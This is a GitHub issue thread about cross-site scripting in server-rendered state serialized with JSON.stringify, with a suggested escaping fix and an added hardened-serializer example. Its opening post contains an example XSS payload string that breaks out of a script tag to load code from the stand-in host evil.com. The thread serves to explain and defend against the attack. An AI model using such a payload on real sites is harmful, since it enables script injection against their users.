
XSS #1

Closed
Rich-Harris opened this issue Mar 10, 2018 · 3 comments

Comments

@Rich-Harris
Owner

Say you're server-rendering a page and want to serialize some state, which could include user input. JSON.stringify doesn't protect against XSS attacks:

const state = {
  userinput: `</script><script src='https://evil.com/mwahaha.js'>`
};

const template = `
<script>
  var preloaded = ${JSON.stringify(state)};
</script>
`;

That would result in this...

<script>
  var preloaded = {"userinput":"</script><script src='https://evil.com/mwahaha.js'>"};
</script>

...which would obviously load a script from evil.com.

The same is true of devalue. We should be able to prevent those attacks by replacing any instance of </ with <\u002f, though I'd love for someone else to tell me if I'm right about that.

@rbadr

rbadr commented Mar 10, 2018

Hi Rich,

You can prevent these attacks by escaping HTML characters. You can use or check the implementation of serialize-javascript developed by Yahoo, it provides these safety practices.

</script> will be transformed to \u003C\u002Fscript\u003E for example.
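The following is an added example written for this thread; it is not code from devalue, from serialize-javascript, or from either commenter. It places the vulnerable `JSON.stringify` pattern from the opening post next to a hardened serializer that applies the escaping rbadr describes (`<`, `>` and `/` become `\u003C`, `\u003E` and `\u002F`), and includes a check that confirms no raw `<` survives in the payload, so the HTML parser can never see a `</script>` inside the script element. The sample `state` object is constructed to mirror the one in the issue; the function names are this example's own.

```javascript
// Added example, not part of the devalue project or this issue thread.
// Constructed sample state: the attacker-controlled string from the issue.
const state = {
  userinput: "</script><script src='https://evil.com/mwahaha.js'>"
};

// Vulnerable: JSON.stringify leaves "</script>" intact in its output, so the
// HTML parser closes the script element early and treats the rest as markup.
function serializeUnsafe(value) {
  return JSON.stringify(value);
}

// Hardened: rewrite '<', '>' and '/' as JSON \uXXXX escapes. JSON.parse (and
// the JS engine reading the embedded literal) restores the original characters,
// but the HTML parser only ever sees "\u003C\u002Fscript\u003E".
const ESCAPES = { "<": "\\u003C", ">": "\\u003E", "/": "\\u002F" };

function serializeSafe(value) {
  return JSON.stringify(value).replace(/[<>/]/g, (ch) => ESCAPES[ch]);
}

// Same template as in the issue: the serialized state dropped into a <script>.
function renderPreloaded(serialized) {
  return `<script>\n  var preloaded = ${serialized};\n</script>`;
}

// Sanity check for the payload: a raw '<' is the only way to start "</script"
// (or "<!--", "<script") inside script data, so none may remain.
function hasRawAngleBracket(serialized) {
  return /</.test(serialized);
}

// Count how many "</script>" the HTML parser would encounter: the wrapper's own
// closing tag is exactly one; anything more means the payload broke out.
function countScriptEndTags(html) {
  return html.split("</script>").length - 1;
}

// Standalone usage (prints 2 for the unsafe page, 1 for the safe one).
console.log(countScriptEndTags(renderPreloaded(serializeUnsafe(state))));
console.log(countScriptEndTags(renderPreloaded(serializeSafe(state))));
```

Because the escapes are ordinary JSON string escapes, `JSON.parse(serializeSafe(state))` is deep-equal to `state`, so the client-side consumer needs no change; only the server-side serializer does.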

@Rich-Harris
Owner Author

Excellent, thank you! I'll borrow that code.

@rbadr

rbadr commented Mar 10, 2018

You're welcome.

Rich-Harris added a commit that referenced this issue Mar 10, 2018
aldarund added a commit to aldarund/devalue that referenced this issue Oct 13, 2018
* warn instead of error for non pojo attrs

* change refs

* add support for objects with toJson method
Rich-Harris#1